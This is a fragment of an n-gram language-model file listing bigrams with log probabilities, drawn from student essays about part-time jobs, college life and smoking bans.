-1.1683137 willing to help
-0.91658795 activities to help
-0.91658795 loans to help
-1.7009193 going to help
-0.91658795 contacts to help
-0.91658795 week to help
-0.91658795 network to help
-0.91658795 references to help
-1.8182895 well as help
-0.9203958 jobs also help
-0.9203958 they also help
-0.92991406 such jobs help
-0.92991406 Real-world jobs help
-1.2417325 and may help
-0.8965162 job should help
-1.1331041 work should help
-0.8965162 activities should help
-1.2605217 then they help
-1.2323583 that could help
-0.887272 industry could help
-0.8619134 will usually help
-0.8863604 will perhaps help
-2.170949 believe that when
-2.0733106 part-time job when
-1.9974141 that is when
-1.5112284 cases , when
-1.4012142 year , when
-1.5112284 addition , when
-0.62516165 Also , when
-1.6471226 their field when
-0.9638933 assignments and when
-1.3871418 their study when
-1.7107412 most students when
-1.6340408 a time when
-1.8266197 in school when
-0.93693215 time -LRB- when
-0.9475876 chores so when
-0.9383143 But even when
-0.9513257 opportunity more when
-1.1997843 do better when
-1.1594872 much better when
-1.1530331 of food when
-0.9538185 All people when
-1.8320426 to help when
-1.5202897 to do when
-1.3639759 an opportunity when
-0.7730377 many distractions when
-0.8395129 better grades when
-0.53858435 is useless when
-1.7033222 it fs when
-1.2245153 tertiary education when
-1.2624828 to quit when
-1.144322 our lives when
-0.9323189 interesting things when
-0.7721529 to discover when
-0.89179134 study later when
-0.7009841 this fact when
-0.8126497 important stage when
-0.7009841 a car when
-0.53858435 a bubble when
-0.53858435 once established when
-0.53858435 importance whatsoever when
-0.7009841 quite ill when
-0.53858435 withdrawal pains when
-1.6653783 working , trying
-1.9747503 they are trying
-1.6326073 you are trying
-0.93793696 never-the-less are trying
-1.7089026 <s> I do
-1.4862304 reasons I do
-1.7146312 jobs that do
-0.8598181 , often do
-1.173763 students often do
-1.420439 did not do
-1.7792387 job and do
-1.4738201 student to do
-1.4167297 , to do
-1.4516227 and to do
-1.3054724 has to do
-1.0889852 as to do
-1.2153151 have to do
-1.4025971 money to do
-1.5313219 able to do
-1.261049 trying to do
-1.4580126 them to do
-1.261049 expected to do
-0.8703854 Learning to do
-1.0920277 how to do
-1.3819975 difficult to do
-1.261049 hard to do
-0.53685457 want to do
-1.0889852 freedom to do
-0.8703854 needed to do
-1.261049 allowed to do
-1.1958237 right to do
-1.1958237 choose to do
-1.333337 wish to do
-0.9407659 -RRB- students do
-2.30705 college students do
-1.4741101 university students do
-0.95964414 companies should do
-1.8081673 not only do
-1.6434685 that they do
-1.4436612 and they do
-1.0317765 if they do
-0.8884553 or they do
-1.1192975 If they do
-1.5690554 <s> To do
-0.9412867 they even do
-1.0267771 students who do
-1.4736938 those who do
-0.9564794 Such people do
-0.86006814 who eventually do
-0.9525707 we would do
-0.89283496 Many families do
-1.74974 in Japan do
-1.1400255 college age do
-0.83880484 If we do
-1.1746054 believe we do
-0.83880484 everything we do
-0.77441466 in general do
-0.5399039 study programs do
-0.5399039 <s> Nor do
-1.6365374 this is something
-2.343354 it is something
-1.8042588 , is something
-0.94945806 years studying something
-0.9434247 work -LRB- something
-0.87733936 or understanding something
-0.9373134 of doing something
-1.2523851 to do something
-1.5377971 they want something
-0.96834993 put in your
-1.2529019 unrelated to your
-2.0722487 related to your
-0.9619243 prove to your
-0.9642781 something on your
-1.9369686 , if your
-0.9461642 lose but your
-1.746008 to pay your
-1.4279255 you have your
-0.3419854 , expanding your
-0.3419854 by expanding your
-0.70431596 thus increasing your
-1.1165215 , earning your
-0.70431596 and enjoying your
-0.84088486 , namely your
-1.5729471 having to earn
-1.2795402 job to earn
-1.1530191 working to earn
-1.9602752 students to earn
-1.6790457 have to earn
-0.907955 part to earn
-0.907955 ; to earn
-1.7228308 able to earn
-1.5729471 need to earn
-1.3599916 start to earn
-1.1530191 just to earn
-1.3599916 means to earn
-0.907955 takes to earn
-1.1530191 required to earn
-1.2624063 than they earn
-1.7384325 don ft earn
-0.877244 they actually earn
-1.2363868 When we earn
-1.2639482 possibilities for other
-1.5624342 on the other
-0.6290242 On the other
-0.86113626 of many other
-1.3344147 are many other
-0.86113626 mention many other
-1.0931585 from any other
-1.0931585 or any other
-1.4375072 interest in other
-1.7024885 time and other
-0.96385974 asthma and other
-1.1918678 lead to other
-2.2722275 <s> The other
-1.9565477 , or other
-1.560199 parents or other
-0.9076598 really know other
-1.5996757 , what other
-1.2062098 worrying about other
-0.70418733 can affect other
-1.6115773 working part-time while
-1.8823237 a job while
-1.2961907 part-time job while
-1.2428509 time job while
-1.267712 them , while
-0.8568776 with working while
-1.26963 that working while
-1.2285646 and working while
-1.3256446 from working while
-2.7787077 part time while
-2.2930973 part-time jobs while
-1.1420693 not work while
-1.7437913 to work while
-0.90169334 students work while
-0.90169334 definitely work while
-0.91191846 and tuition while
-1.9950924 their parents while
-0.54034454 , undertaken while
-1.4818256 work force while
-1.4508681 <s> So while
-1.1406424 never worked while
-1.4888861 the workplace while
-1.2028947 many things while
-0.7035448 get married while
-0.54034454 and mentors while
-0.8855846 not spending while
-1.6607387 are a major
-1.4426589 study and major
-2.163143 in their major
-2.163143 to their major
-0.5615375 to your major
-0.8055107 if your major
-1.7628698 is an advantage
-1.1885792 have an advantage
-1.2677655 major is teaching
-0.7775762 and concerned teaching
-1.5411278 it can take
-0.96386224 it will take
-0.9640375 concentrate and take
-0.9640375 dormitory and take
-1.7273369 and to take
-2.1636844 students to take
-1.9349494 able to take
-0.9362155 first to take
-0.9362155 Having to take
-1.2040032 parents to take
-0.9362155 bound to take
-0.9362155 tempting to take
-1.6179954 we should take
-1.3319018 will only take
-1.1353652 should only take
-0.96592593 sure they take
-0.9461695 and you take
-0.93937165 and must take
-1.2381686 job would take
-0.89502466 where families take
-1.0038619 can easily take
-2.7515192 part-time job tutoring
-0.96382576 combines with high
-1.5434291 also a high
-0.9642957 than a high
-1.2653232 than in high
-1.796114 out of high
-1.2221891 the very high
-0.9613394 graduating from high
-2.344471 they are high
-0.94282675 and into high
-0.54078573 job tutoring high
-1.3313252 is too high
-0.8407087 <s> Getting high
-0.70418733 become extremely high
-0.54078573 <s> Achieving high
-1.6088194 and a chance
-1.3475605 students a chance
-2.220086 have a chance
-1.4589789 them a chance
-0.93557495 -- a chance
-1.2028171 had a chance
-1.2527953 student the chance
-2.1535385 and the chance
-1.4243748 reduce the chance
-1.6597472 the first chance
-1.0473138 the last chance
-0.88792825 their best chance
-1.2571914 They can use
-2.3966527 students to use
-1.4129038 jobs to use
-1.9265647 how to use
-1.7663126 learn to use
-0.9266804 of little use
-0.966284 doubt they use
-1.381893 put into use
-0.9419147 to good use
-1.3587835 students must use
-1.2320743 the best use
-0.541139 would normally use
-2.6509278 of the theories
-0.9674895 put the theories
-0.97038597 theories and practices
-0.9585869 fees for classes
-0.9585869 late for classes
-2.4003224 in the classes
-1.6383449 all the classes
-1.2683165 i.e. , classes
-1.2648718 spent in classes
-2.0956454 money and classes
-0.96860534 load of classes
-2.0864441 going to classes
-2.1396797 to their classes
-0.95759577 pass their classes
-0.94801706 but such classes
-1.3997661 are some classes
-0.9168661 just taking classes
-0.95556235 taking my classes
-1.0151691 to attend classes
-0.84035665 <s> Attending classes
-1.003531 of attending classes
-2.7078164 <s> I fll
-0.7434316 , you fll
-2.0359368 <s> They fll
-1.9179007 they will know
-1.6387419 They will know
-1.9100233 , to know
-0.9028044 Many employers know
-2.0279055 <s> They know
-1.0048888 you fll know
-0.6629386 do n't know
-0.9269427 only really know
-0.9528614 before we know
-1.252457 what I what
-0.9617485 familiar with what
-2.030332 , for what
-1.3911371 studying , what
-1.8452226 However , what
-1.3911371 Thus , what
-0.9519362 growth , what
-0.9519362 ourselves , what
-2.1273615 , and what
-0.947022 you and what
-1.3777586 well and what
-0.947022 enjoy and what
-0.9384727 little of what
-1.8242611 part of what
-0.5105871 idea of what
-1.4673829 taste of what
-0.9384727 sample of what
-0.9649413 in to what
-0.9649413 closer to what
-1.5241202 different from what
-1.6991237 focus on what
-0.9184386 take on what
-1.3903593 based on what
-0.93922484 applied -LRB- what
-2.137216 , or what
-2.1078327 to do what
-0.7662962 fll know what
-0.9990991 n't know what
-1.084998 , nor what
-1.0120226 <s> Learning what
-0.93933046 figuring out what
-1.3764443 also learn what
-0.70239055 to sacrifice what
-0.8740108 and appreciate what
-1.0431069 us realize what
-0.7738104 and yet what
-0.8144695 student determine what
-0.7744382 that choosing what
-0.87305 show us what
-0.53955156 to payback what
-0.53955156 also destroying what
-0.53955156 to tell what
-0.9539341 if one works
-1.2373741 know what works
-1.5055339 and what doesn
-1.078522 who don ft.
-0.54166937 what doesn ft.
-0.54166937 I hadn ft.
-1.9124578 , I could
-1.1725967 : I could
-1.1725967 wish I could
-1.7182425 , this could
-0.9427243 that that could
-1.597595 jobs that could
-0.9427243 energy that could
-2.6606905 part-time job could
-1.945166 example , could
-0.9663883 jobs and could
-1.3117808 the course could
-1.3552831 of study could
-0.9561883 Work experience could
-2.0958757 their studies could
-2.2795806 part-time jobs could
-1.9620247 , but could
-0.8849789 Those experiences could
-1.1365458 the industry could
-0.87460303 fs parents could
-0.87460303 his parents could
-1.6623164 <s> This could
-1.2126974 your major could
-1.0859262 , nor could
-0.8739197 minted graduates could
-0.702775 A solution could
-0.5398157 or gifted could
-0.5398157 <s> Universities could
-0.5398157 <s> Which could
-0.9398239 a man could
-2.0023398 money , expanding
-0.9585228 you by expanding
-1.1787019 expanding your horizons
-0.7775762 horizons thus increasing
-0.8186068 the ever increasing
-0.9498921 to job opportunities
-0.9498921 your job opportunities
-0.9708217 leading to opportunities
-2.313727 <s> The opportunities
-1.8792711 a job after
-1.5167912 full-time job after
-1.3170316 first job after
-2.153923 It is after
-2.3703437 the student after
-1.0983156 of time after
-1.8877031 to work after
-1.411979 time work after
-1.1845593 extra work after
-1.6299971 may have after
-0.8934455 job offer after
-0.94156766 pressured into after
-0.93334645 soon enough after
-2.1190958 to do after
-0.4033013 job opportunities after
-1.5972294 at all after
-0.9566187 awaits them after
-1.6118935 for life after
-1.2269013 an adult after
-0.5400801 will encounter after
-0.43169218 wait until after
-1.2894671 at home after
-0.8393022 I got after
-0.5400801 for teenagers after
-0.5400801 in Massachusetts after
-1.1477121 <s> In conclusion
-2.3945477 , I encourage
-1.8865801 is to encourage
-1.4356328 begin to encourage
-0.9620633 Parents should encourage
-0.9450812 possibly even encourage
-1.4388012 reason for all
-1.165006 but for all
-1.0359638 pay for all
-2.1599114 important for all
-0.9147321 grandparents for all
-1.421735 find it all
-2.2855616 should be all
-1.4374133 Also , all
-1.6932291 can not all
-2.0002034 <s> In all
-1.2249509 successful in all
-0.21555878 banned in all
-0.6849079 smoking in all
-1.3513527 top of all
-1.3513527 those of all
-1.3513527 risk of all
-0.9370397 First of all
-0.9370397 perversion of all
-1.9083741 <s> For all
-0.9539569 an experience all
-1.1983999 and from all
-1.1983999 banned from all
-0.8393538 being tired all
-1.5632917 to focus all
-2.1037557 , or all
-0.89466 Evaluations are all
-1.1299086 Internships are all
-0.89466 responsibilities are all
-0.89466 superiors are all
-0.89466 rejected are all
-0.99403924 is at all
-0.8105507 not at all
-0.8105507 in at all
-1.1265035 work at all
-0.8105507 banned at all
-0.8301181 should spend all
-1.471925 to put all
-1.3958421 with people all
-1.981176 <s> They all
-0.95066875 opportunity when all
-0.8972057 they use all
-0.9426458 is after all
-0.83871865 I encourage all
-1.6694065 for them all
-2.0047634 I believe all
-1.3944409 social life all
-1.0896369 can explore all
-0.83615386 <s> Should all
-0.9099871 they understand all
-1.3787414 that we all
-1.107935 , complete all
-0.8393538 burden within all
-0.8124847 and cover all
-0.5384965 which covered all
-0.5384965 therefore behooves all
-0.7720026 , indeed all
-0.5384965 , standing all
-0.5384965 popular amongst all
-1.5465672 I disagree because
-1.3536438 this statement because
-1.0251058 the statement because
-0.96617705 case that because
-2.668116 part-time job because
-1.7477438 reason is because
-1.4190751 jobs is because
-2.175068 time , because
-2.2840395 part-time jobs because
-1.6563098 high school because
-1.765054 after college because
-1.5561395 during college because
-1.2385018 much more because
-0.8391267 an advantage because
-0.8739996 of workers because
-0.7030314 is unfortunate because
-1.5111939 <s> But because
-1.1725873 and responsibility because
-0.8739996 well-being simply because
-1.47387 be banned because
-0.7745659 physical activity because
-0.7745659 left behind because
-0.8152993 eat properly because
-1.0013055 public places because
-0.5399919 all ages because
-1.2519023 but the opportunity
-1.8794577 have the opportunity
-1.2519023 them the opportunity
-2.2924817 <s> The opportunity
-0.59520286 students an opportunity
-1.2189987 such an opportunity
-0.88118565 are an opportunity
-1.7244433 an important opportunity
-0.862839 their educational opportunity
-1.770952 a good opportunity
-1.1955028 has no opportunity
-0.54122734 a wonderful opportunity
-1.249389 cope with them
-1.2645844 is for them
-2.1044948 important for them
-1.3420541 opportunity for them
-1.1417947 done for them
-1.1417947 right for them
-0.90153533 smoky for them
-1.7088569 some of them
-0.96079457 hundreds of them
-1.3960886 up to them
-1.8580261 lead to them
-0.95373076 unavailable to them
-0.95373076 assigned to them
-1.5177864 different from them
-1.239849 will benefit them
-0.7093446 , gives them
-0.7093446 This gives them
-0.95656395 can help them
-0.94670236 will help them
-0.8517212 to help them
-0.8833098 should help them
-0.8280027 could help them
-1.1885191 only take them
-0.838894 even encourage them
-0.88149714 to teach them
-0.62535644 will give them
-0.28678316 and give them
-0.61669636 will make them
-0.7721529 and allowing them
-0.88986665 would force them
-0.34087554 this prepares them
-0.34087554 and prepares them
-0.7721529 by giving them
-0.53858435 that awaits them
-0.92397624 can support them
-0.32026902 it allows them
-0.39176363 part-time allows them
-0.4529322 job allows them
-0.39176363 It allows them
-0.8719202 and let them
-0.7721529 better enables them
-0.39075708 and teaches them
-0.39075708 time teaches them
-0.24517494 It teaches them
-0.7009841 has brought them
-0.5420023 , preparing them
-0.46803603 Thereby preparing them
-0.53858435 n't kill them
-0.8126497 go serve them
-0.93673736 may cause them
-0.84065425 that interest them
-0.3603942 will assist them
-0.648938 and assist them
-0.7721529 help prepare them
-0.53858435 and encouraging them
-0.53858435 is treating them
-0.53858435 this distracts them
-0.53858435 scholarship fed them
-0.53858435 clothes impress them
-0.53858435 and guide them
-0.53858435 which suits them
-1.9789475 for their present
-0.5417812 their present situations
-0.96877724 also their futures
-0.9676906 idea that Japanese
-1.267329 percentage of Japanese
-0.9700051 pertain to Japanese
-1.3951089 that if Japanese
-0.94578886 entering most Japanese
-1.2681019 <s> As Japanese
-0.8762872 honed workers Japanese
-1.2180729 the young Japanese
-0.5410506 a typical Japanese
-1.5162457 too many distractions
-0.92797023 as little distractions
-1.2044742 have enough distractions
-0.9681654 replacement for real
-2.0475821 for a real
-2.2450676 is a real
-1.2451998 obtain a real
-2.0340137 for the real
-1.6261779 of the real
-1.677923 to the real
-1.2077136 from the real
-0.939197 students the real
-1.209543 what the real
-0.939197 how the real
-1.6350857 , not real
-1.9257386 are not real
-2.0223923 job in real
-1.969165 for their real
-2.2924817 <s> The real
-1.7174667 there are real
-0.96906173 onus is therefore
-1.2647392 cards , therefore
-0.9679412 choices , therefore
-1.9083064 , and therefore
-0.96528363 enough and therefore
-2.0977995 student to therefore
-2.0932171 <s> It therefore
-1.3718724 and can provide
-0.74178433 jobs can provide
-1.6316545 jobs will provide
-1.5440823 will not provide
-0.9667884 appear to provide
-0.9667884 compelled to provide
-1.61186 can also provide
-1.5061487 but also provide
-1.5861582 part-time jobs provide
-0.8244096 Part-time jobs provide
-0.9427098 and thus provide
-1.6430008 money they provide
-0.9523749 ; they provide
-0.86228335 Japanese colleges provide
-1.4070458 study would provide
-1.1949152 college years provide
-2.1065567 will be useful
-1.2644931 anything that useful
-2.0822165 be a useful
-1.8601147 that will useful
-1.3769163 be very useful
-1.9498975 young people useful
-1.6129606 are all useful
-0.93153846 not provide useful
-0.704702 be extremely useful
-1.6019509 of this society
-2.5837984 of the society
-2.457717 to the society
-1.2303332 positions in society
-0.9502293 behave in society
-0.9502293 involvement in society
-0.9564748 good of society
-0.7480461 member of society
-1.5144726 members of society
-0.9665571 valuable to society
-1.262002 back to society
-2.282181 to their society
-0.79470503 <s> Japanese society
-0.63544023 As Japanese society
-0.63544023 workers Japanese society
-1.4011805 today fs society
-0.8620951 a free society
-0.54078573 the broader society
-0.3802507 in modern society
-0.54078573 fs consumerist society
-0.54078573 the @ society
-2.314604 in their specialized
-0.8186068 is highly specialized
-0.9545869 student be expected
-1.9340057 not be expected
-2.125482 are not expected
-1.7852325 They are expected
-2.1114297 them to function
-1.5571167 expected to function
-2.4549673 in a broad
-0.97076845 While the range
-0.54174346 a broad range
-1.269442 range of contexts
-2.315096 , it must
-1.688601 college student must
-0.908978 A student must
-0.908978 Each student must
-1.724643 home and must
-1.928407 college students must
-0.9567568 So students must
-1.6598275 but also must
-1.3906181 , one must
-1.2333263 this they must
-0.9517971 stressful they must
-2.0034525 <s> There must
-0.92615986 Young people must
-1.7183925 young people must
-0.84018075 <s> Workers must
-0.8751419 all workers must
-1.2352184 <s> Students must
-0.84302795 , she must
-1.5760257 , we must
-0.54052097 's context must
-1.6503577 must be familiar
-0.9697608 could of done
-0.94828415 job has done
-0.9246443 everything being done
-0.44723547 others have done
-0.93760765 have things done
-0.87712383 get anything done
-1.4956698 in this area
-0.92618436 on this area
-2.1653402 in their area
-2.1653402 to their area
-1.817031 one fs area
-2.080375 field of specialty
-1.4327637 area of specialty
-0.96906173 labor is n't
-0.92420197 often do n't
-0.99438626 students do n't
-0.62604094 they do n't
-0.76353276 even do n't
-0.76353276 Japan do n't
-0.8880774 It did n't
-0.3422847 it wo n't
-0.3422847 customers wo n't
-0.3422847 they ca n't
-0.3422847 Customers ca n't
-1.259224 whatever I whatever
-0.96854 cash for whatever
-0.9707589 done , whatever
-1.4285406 it on whatever
-2.1506422 to do whatever
-2.4961555 time job might
-0.95888126 flipping experience might
-0.9666423 whatever they might
-0.77699226 the employer might
-0.95324636 or what might
-0.953217 job we might
-1.844441 what they produce
-0.86394703 they might produce
-0.9709622 exams , fit
-1.4897941 will not fit
-1.6388371 , not fit
-1.5687287 unable to fit
-0.9639046 they , nor
-0.9639046 18 , nor
-0.9639046 bartender , nor
-1.0713639 the customer nor
-0.9580587 job by itself
-0.9691483 is in itself
-1.4190361 of working itself
-0.8633952 health factor itself
-0.70521736 can manifest itself
-1.5470109 it 's external
-1.557447 to their subject
-0.54174346 the specific subject
-1.2596699 work will interfere
-1.4167826 their jobs interfere
-1.9175113 with their grades
-2.2784586 of their grades
-0.93925536 got better grades
-0.94298583 getting good grades
-0.92210096 Getting high grades
-1.4295079 and with specialization
-0.9689191 concerned is usually
-1.6352395 jobs will usually
-1.8326062 and they usually
-1.2113733 It 's usually
-2.1487837 students are usually
-1.5374187 do n't usually
-1.3949726 with some menial
-1.4513023 and doing menial
-0.86376655 's usually menial
-2.2198038 for a specialist
-1.2678866 experience is useless
-0.9631052 where I get
-0.8869368 money can get
-1.1357124 they can get
-0.8869368 people can get
-1.1167169 They can get
-1.9066446 they will get
-0.9448167 people will get
-0.95612115 graduate and get
-1.2416325 children and get
-0.95612115 feet and get
-1.6820836 having to get
-1.6978098 and to get
-2.1162646 students to get
-1.293146 time to get
-0.7340346 work to get
-1.8190119 have to get
-1.4274877 or to get
-1.8851031 able to get
-0.93061244 kids to get
-1.8805392 that students get
-0.95655394 allow students get
-0.9514322 does one get
-2.2633758 students should get
-1.6321554 if they get
-1.3686041 so they get
-0.8692438 : they get
-1.527001 when they get
-1.2582479 once they get
-0.8692438 information they get
-0.9619811 it or get
-2.0122752 <s> They get
-0.9459612 gifted could get
-0.91987664 help them get
-1.1503136 ca n't get
-0.8609898 n't usually get
-0.9248628 n't really get
-1.138639 and ultimately get
-0.8747608 to actually get
-1.3259969 their chosen fields
-0.86394703 completely different fields
-0.9326779 thus provide relevant
-0.84507585 the various relevant
-0.7774487 in areas relevant
-2.290678 to be another
-1.6322136 to find another
-0.844898 employment hold another
-0.70534635 c Yet another
-0.8186068 be another source
-0.93476766 its our source
-1.2693326 source of temptation
-0.9446826 to sample temptation
-1.2654953 important that colleges
-2.552962 for the colleges
-0.4548204 universities and colleges
-2.326481 on their colleges
-1.2943283 <s> Japanese colleges
-1.2691678 choosing the club
-0.9680855 planning their club
-1.7578514 away from club
-0.96443766 studies or club
-1.0773102 , whether club
-0.9321078 colleges provide club
-0.960962 part in activities
-1.2510233 engaging in activities
-1.7702909 the college activities
-1.559037 <s> These activities
-1.2251629 the same activities
-0.6511158 from club activities
-0.6511158 provide club activities
-0.9174107 and social activities
-0.8818486 various social activities
-0.8956258 from these activities
-0.8956258 supporting these activities
-0.5406974 other genuine activities
-0.77577734 or community activities
-0.31857684 for extra-curricular activities
-0.31857684 , extra-curricular activities
-0.31857684 of extra-curricular activities
-0.5406974 <s> Said activities
-0.5406974 have extracurricular activities
-0.70405877 and recreational activities
-0.5406974 to group activities
-1.7915295 help students socialize
-0.9676401 activities are sufficient
-0.9254347 still find sufficient
-1.4787323 college will teach
-0.94628775 correspondence will teach
-0.97023827 sufficient to teach
-1.8141911 can also teach
-2.3166041 part-time jobs teach
-1.4049523 this may teach
-1.2650744 job helps teach
-1.1915112 can ft teach
-1.5288714 to them teach
-1.7190255 people , how
-0.9668319 thought , how
-1.2646464 training in how
-1.0182469 money and how
-0.96847713 student of how
-0.9669526 teach students how
-0.9454118 teach you how
-0.9598557 shocked at how
-0.95737004 teach them how
-0.9443047 is learning how
-0.9443047 and learning how
-0.777319 of learning how
-1.0896158 can learn how
-1.3223689 to learn how
-1.0896158 they learn how
-0.9129 could understand how
-0.9227331 to Japan how
-0.7038017 they knew how
-1.115604 first hand how
-1.014906 be taught how
-2.0708947 how to behave
-2.4179401 the student away
-1.7386228 spend time away
-1.2321516 takes time away
-0.93384314 will take away
-0.9587257 take them away
-0.8631195 side takes away
-0.5413157 have moved away
-0.5413157 they possess away
-0.8170551 job will give
-1.3941864 , will give
-1.4557226 jobs will give
-0.95804554 activities and give
-1.5201763 discipline and give
-0.95804554 resumes and give
-2.103015 them to give
-1.8939391 want to give
-2.010449 part-time jobs give
-1.9523904 time jobs give
-2.2096324 that they give
-0.8177979 I fll give
-0.95512146 This would give
-1.6172948 give them unstructured
-1.694233 students with social
-2.3724518 in the social
-0.96421695 miss the social
-1.5612947 study , social
-1.435036 studying and social
-0.93300235 academic and social
-0.93300235 finances and social
-0.446374 organizational and social
-0.93300235 dorm and social
-0.93300235 drugs and social
-0.96758085 interests of social
-0.9653388 balance their social
-0.81513315 a highly social
-1.2037495 his future social
-1.713878 an important social
-0.87192225 fit into social
-0.87192225 integrated into social
-0.5399039 them unstructured social
-0.8415326 their immediate social
-0.8415326 enjoy various social
-0.94004524 ; building social
-1.3780397 must learn social
-0.70290315 and joining social
-0.93034583 fs our social
-0.88466644 or develop social
-0.70290315 develop stronger social
-0.5399039 the inherent social
-0.5399039 better communicative social
-0.70290315 and changing social
-0.5399039 an exciting social
-0.96550435 experiences with unpredictable
-0.5417812 with unpredictable results
-1.3682667 They become unwilling
-0.96516645 association with fellow
-2.0077977 with their fellow
-1.2545568 learning from fellow
-0.957627 versus my fellow
-0.9710474 classmates , teachers
-1.7390541 students and teachers
-0.96952754 students is unworthy
-2.8185043 of the finely
-0.5417812 the finely honed
-0.9700162 mind the workers
-1.5654185 majority of workers
-1.775758 full time workers
-0.9587917 experience all workers
-0.5413157 finely honed workers
-0.5413157 to unmotivated workers
-0.5413157 <s> Restaurant workers
-2.3153777 , the demands
-2.470896 of the demands
-0.9621749 If the demands
-1.2529172 earning money demands
-1.370003 Japanese society demands
-1.3721162 <s> I strongly
-2.155109 , I strongly
-0.7055833 commitments depends strongly
-0.86340475 <s> I believe
-0.57916427 that I believe
-0.5539567 , I believe
-0.57916427 why I believe
-0.84421915 Overall I believe
-0.84421915 justice I believe
-1.3120548 I also believe
-0.9214782 people also believe
-1.7363645 don ft believe
-0.36003923 I strongly believe
-1.326134 I really believe
-0.7768402 I truly believe
-0.84176666 I firmly believe
-0.89953196 that it fs
-1.5010281 , it fs
-1.1795561 feel it fs
-0.96642894 And that fs
-0.9995493 a student fs
-0.78514034 the student fs
-1.6852756 college student fs
-0.7085809 that there fs
-0.8467365 and there fs
-0.7085809 then there fs
-0.7085809 when there fs
-0.49536443 for one fs
-0.6742564 in one fs
-0.59920734 of one fs
-0.80022377 to one fs
-0.6742564 on one fs
-0.3696945 during one fs
-0.71073717 In today fs
-0.3824982 in today fs
-2.0001957 <s> There fs
-1.1961098 <s> It fs
-0.8609031 their club fs
-0.8849932 determine someone fs
-1.0964448 , let fs
-0.8156316 in anyone fs
-0.93468004 a person fs
-0.703288 summer break fs
-0.9109734 minded individual fs
-0.54016817 <s> What fs
-0.54016817 of Mammon fs
-0.54016817 our father fs
-0.54016817 and grandfather fs
-0.54016817 <s> Let fs
-2.2080355 , the main
-1.9410868 of the main
-1.9221643 from the main
-1.242371 overlook the main
-1.2464976 <s> The main
-0.7173707 are two main
-1.8460546 is a lot
-1.3992524 gain a lot
-1.461565 are a lot
-0.92141837 like a lot
-0.92141837 learn a lot
-0.92141837 costs a lot
-0.92141837 me a lot
-0.92141837 experienced a lot
-0.9533607 support this life
-1.3810753 preparation for life
-2.1623528 important for life
-1.5602671 them for life
-0.9152844 responsibilities for life
-0.9152844 bond for life
-0.9347163 of valuable life
-1.2465914 , student life
-1.2670254 on in life
-0.9025917 success in life
-1.1436332 successful in life
-0.9025917 purpose in life
-1.1436332 early in life
-0.9025917 independence in life
-0.71842355 later in life
-1.2581555 benefits and life
-0.9376362 more of life
-0.9376362 areas of life
-0.9376362 interpretation of life
-0.9376362 walks of life
-0.9376362 phase of life
-2.101918 in their life
-2.2123437 of their life
-1.4304931 and working life
-1.3372868 of working life
-1.2393456 a students life
-1.5909344 young students life
-0.62282866 from school life
-1.5758824 that college life
-1.3801777 the college life
-1.4461979 of college life
-1.4364376 their college life
-0.8687548 enjoy college life
-1.2002305 his future life
-0.91251564 in real life
-0.8913485 a useful life
-0.796652 , social life
-1.2214518 and social life
-0.796652 exciting social life
-1.2748603 student fs life
-1.2465287 one fs life
-0.8115144 anyone fs life
-0.9955104 person fs life
-1.1881185 of university life
-0.9345709 people make life
-0.8910022 their professional life
-1.4937048 to enjoy life
-0.44639388 lessons about life
-1.221366 a great life
-0.70149505 less complicated life
-1.0828398 a positive life
-1.0400496 an essential life
-1.1259946 in later life
-0.61701244 in his life
-0.6063587 the daily life
-0.6063587 enjoy daily life
-0.70149505 into everyday life
-0.53893584 work \/ life
-0.70149505 my private life
-0.70149505 of enjoying life
-0.53893584 the boring life
-0.97055566 speaking , entering
-1.2695328 prior to entering
-1.7906784 who are entering
-1.708251 They are entering
-0.9357073 graduation through entering
-0.8632945 difficult transition entering
-0.90896004 years before entering
-0.5413157 should postpone entering
-2.3699102 to the workforce
-1.6943778 into the workforce
-1.4204404 entering the workforce
-1.5905943 <s> Having prior
-0.96057975 the workforce prior
-0.7054753 challenges exists prior
-1.7016098 <s> Many recently-graduated
-2.1597657 students are woefully
-0.5417812 are woefully unprepared
-2.5668569 for the realities
-0.7055833 the mundane realities
-2.2235188 and the responsibilities
-2.031235 of the responsibilities
-0.9558073 have many responsibilities
-0.9690776 realities and responsibilities
-1.2578748 burden of responsibilities
-1.2578748 list of responsibilities
-0.44890815 student additional responsibilities
-0.44890815 on additional responsibilities
-0.44890815 have additional responsibilities
-0.95632863 learn important responsibilities
-0.94594836 future social responsibilities
-0.8174639 and balancing responsibilities
-0.541139 their scholastic responsibilities
-2.2536452 can be particularly
-1.7622269 student , particularly
-0.9639046 of , particularly
-1.635335 jobs , particularly
-0.96716785 true for university
-0.9684715 known a university
-1.507238 so many university
-0.9678205 College and university
-0.9635739 nature of university
-1.7009248 outside of university
-1.0741532 we leave university
-1.7864997 , then university
-0.9623895 college or university
-0.84722614 them through university
-1.051316 way through university
-1.1955805 time at university
-0.9316489 spent at university
-0.7038017 They view university
-0.54052097 companies hire university
-1.1001545 <s> At university
-1.0884112 to cover university
-0.7038017 going onto university
-0.54052097 of contemporary university
-0.966636 preciously be used
-0.9689191 <s> is used
-0.9425803 can become used
-0.9376271 be well used
-1.6453662 and are used
-0.8963398 had never used
-0.97014666 freedom of staying
-1.4451698 used to staying
-2.3839705 they are staying
-0.96664363 not is up
-0.9158281 from taking up
-1.0425228 to show up
-1.6475724 to take up
-1.1400146 to give up
-0.7745659 to staying up
-1.2130438 will make up
-1.4169112 to make up
-0.86025226 also entirely up
-0.7745659 to weigh up
-0.9220201 from getting up
-0.3182947 of growing up
-0.3182947 was growing up
-0.3182947 youngsters growing up
-0.5502753 students end up
-0.5502753 who end up
-0.6413871 be taken up
-0.5502753 best taken up
-0.5399919 of ending up
-0.7030314 and setting up
-0.5399919 be passed up
-0.5399919 to speed up
-0.51071906 to grow up
-0.5399919 all add up
-0.5399919 , picking up
-0.5399919 to catch up
-0.5399919 I ended up
-1.5680776 hours , late
-0.94020337 then often late
-0.96903414 sleeping in late
-2.3028445 in their late
-0.94571096 staying up late
-0.8770525 restaurants until late
-1.7417587 into the night
-0.96161425 late at night
-0.9672094 actually be sleeping
-1.4372338 studying , sleeping
-1.2651393 night , sleeping
-0.86376655 , poor sleeping
-0.9710908 late , neglecting
-0.9687079 neglecting their commitments
-1.4943943 their academic commitments
-1.6601155 , with no
-0.9459653 basis with no
-1.9577751 there is no
-0.924098 There is no
-1.268922 expectations , no
-0.96834993 then in no
-2.607604 , and no
-1.2668191 is of no
-0.88773537 and has no
-0.88773537 workplace has no
-1.3247299 and have no
-1.7804554 they have no
-1.3247299 They have no
-0.96320766 little or no
-1.6400849 we are no
-0.9239147 have had no
-0.70431596 are virtually no
-2.4359963 of their immediate
-2.3051038 <s> The immediate
-1.0473138 will show immediate
-1.3940659 and get immediate
-0.9322244 or no immediate
-0.8453008 no immediate repercussions
-2.164092 as a result
-1.4330599 As a result
